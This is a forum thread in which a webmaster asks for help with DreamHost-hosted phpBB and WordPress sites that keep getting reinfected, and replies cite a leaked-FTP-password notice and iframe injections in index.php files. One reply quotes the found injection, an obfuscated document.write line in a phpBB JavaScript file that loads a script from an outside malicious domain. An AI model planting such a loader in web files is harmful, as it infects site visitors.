• 0

DreamHost Site Hacked


Question

Some of my sites were recently listed by Google as having malicious content, I re-uploaded the files from my PC and all seemed fine, but a few days ago I got another message that three different sites had been listed. Sure enough, when I visited http://forums.lime49.com, I was prompted to download an ActiveX control which I have no knowledge of. The sites are hosted on DreamHost, and clearing the cache on the forums seems to work, but a day or so later it's become re-infected.

The forum runs PHPBB 3.0.5 linked to MediaWiki. I also run MovableType 4.23 and WordPress 2.85 on two different domains. I rely on these sites for my livelihood and am desparate to sort this problem out.

The generic tips (delete suspicious files etc) are quite hard to apply as I have about 10 domains on DreamHost with hundreds of directories. I don't know where to start.

Link to comment
https://www.neowin.net/forum/topic/842752-dreamhost-site-hacked/
Share on other sites

13 answers to this question

Recommended Posts

  • 0

Seeing as I can't edit. Here is some more information about why you may of got hacked:

http://www.caydel.com/dreamhost-leaks-3500-ftp-passwords/

Kinda **** huh

From: DreamHost Security Team

Subject: URGENT: FTP Account Security Concerns?

Hello -

This email is regarding a potential security concern related to your

?XXXX? FTP account.

We have detected what appears to be the exploit of a number of

accounts belonging to DreamHost customers, and it appears that your

account was one of those affected.

We?re still working to determine how this occurred, but it appears

that a 3rd party found a way to obtain the password information

associated with approximately 3,500 separate FTP accounts and has

used that information to append data to the index files of customer

sites using automated scripts (primarily for search engine

optimization purposes).

Our records indicate that only roughly 20% of the accounts accessed -

less than 0.15% of the total accounts that we host - actually had

any changes made to them. Most accounts were untouched.

We ask that you do the following as soon as possible:

1. Immediately change your FTP password, as well as that of any other

accounts that may share the same password. We recommend the use of

passwords containing 8 or more random letters and numbers. You may

change your FTP password from the web panel (?Users? section, ?Manage

Users? sub-section).

2. Review your hosted accounts/sites and ensure that nothing has been

uploaded or changed that you did not do yourself. Many of the

unauthorized logins did not result in changes at all (the intruder

logged in, obtained a directory listing and quickly logged back out)

but to be sure you should carefully review the full contents of your

account.

Again, only about 20% of the exploited accounts showed any

modifications, and of those the only known changes have been to site

index documents (ie. ?index.php?, ?index.html?, etc - though we

recommend looking for other changes as well).

It appears that the same intruder also attempted to gain direct

access to our internal customer information database, but this was

thwarted by protections we have in place to prevent such access.

Similarly, we have seen no indication that the intruder accessed

other customer account services such as email or MySQL databases.

In the last 24 hours we have made numerous significant behind-the-

scenes changes to improve internal security, including the discovery

and patching to prevent a handful of possible exploits.

We will, of course, continue to investigate the source of this

particular security breach and keep customers apprised of what we

find. Once we learn more, we will be sure to post updates as they

become available to our status weblog:

  • 0
The warning says http://forums.lime49.com is serving content from google-query.com, but I can't find any reference to it. A search for google-query.com site:lime49.com returns no hits either. How would I find where this is coming from?

Found it in the following file on your server:

http://forums.lime49.com/styles/brushed_me...ate/forum_fn.js

document.write(unescape("%3Cscript src='http://www.google-query.com/ga.php' type='text/javascript'%3E%3C/script%3E"));

Edited by Guest
  • 0
I had the same problem. All my index.php files got infected. Injected with an iframe to load a malicous site.

Same with one of my friend's sites which is hosted as a sub-domain under my site. Might be trojan/virus/malware related (recently read about a trojan that will steal FTP passwords and infect website files). My sites haven't been infected though and I use Dreamhost.

This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Posts

    • Prime Early Deal: Amazon Echo Dot Max drops to its lowest price ever by Fiza Ali While Prime Day 2026 is officially kicking off next week, Amazon has started offering Prime Early Deals already. Particularly, the newest model of Amazon Echo Dot Max, unveiled in September 2025, is now selling at its lowest price yet with a 35% discount on its original MSRP. The device features a two-way mono speaker system comprising a 0.8-inch tweeter and a 2.5-inch woofer that should deliver sound across a claimed frequency range of 53Hz to 16kHz. It offers Wi-Fi 6E support (802.11 a/b/g/n/ac/ax) alongside Bluetooth 5.3 with Low Energy, including A2DP for audio playback and AVRCP for device control. The device also operates as a smart home hub, with built-in support for Zigbee, Matter, and Thread Border Router functionality. Furthermore, Amazon Sidewalk is included to help extend connectivity beyond standard Wi-Fi range by leveraging shared network infrastructure. Under the hood, it is powered by the AZ3 processor with an integrated AI accelerator. It also features Omnisense technology, enabling ambient intelligence capabilities such as presence detection, temperature monitoring, and tap gesture control. There are also additional built-in sensors that include ambient light, temperature, and an accelerometer. When paired with a compatible eero router, it can also help extend Wi-Fi coverage by up to 1,000 square feet, supporting speeds of up to 100Mbps and up to 10 devices on the 5GHz band. Setup is handled via the Alexa app, available on Android, iOS, Fire OS, and web browsers. In terms of privacy, it includes a microphone mute button, wake word activation, and options to review and delete voice recordings. Accessibility features cover adaptive listening, adjustable speech rate, audible request tones, and read-aloud support. Lastly, the device is backed by a one-year limited warranty, with optional extended protection available as well. Amazon Echo Dot Max (newest model): $64.99 (Amazon US) - 35% off Good to know This Amazon deal is U.S. specific, and not available in other regions unless specified. We only use first-party seller links (at the time of article publishing); ensure that you purchase from a first-party seller link only. Check out Today's Deals on Amazon | or our recent tech deals. Become a Prime member (for Students or SNAP) via Neowin Get Prime Access - Prime for half price (for qualifying Medicaid, EBT, SNAP) Subscribe to Prime Video, Audible Plus, Music Unlimited or Kindle Unlimited via Neowin As an Amazon Associate, we earn from qualifying purchases.
    • That's not what I meant:) I like the tabs being above the URL bar, but previously the tab selection started from the top of the screen (y=0). So I could just quickly push my mouse up and done. Now I have to actually aim it just slightly below the top, because the tab is now a few pixels below the top. In other words, previously I only had to aim with my mouse horizontally, now I have to both vertically and horizontally. Super annoying.
  • Recent Achievements

    • One Month Later
      Vincian earned a badge
      One Month Later
    • First Post
      Jocimo earned a badge
      First Post
    • Week One Done
      suprememobiles48 earned a badge
      Week One Done
    • One Month Later
      Windows Guy earned a badge
      One Month Later
    • One Month Later
      Prasann earned a badge
      One Month Later
  • Popular Contributors

    1. 1
      +primortal
      501
    2. 2
      +Edouard
      160
    3. 3
      PsYcHoKiLLa
      86
    4. 4
      Steven P.
      67
    5. 5
      ATLien_0
      64
  • Tell a friend

    Love Neowin? Tell a friend!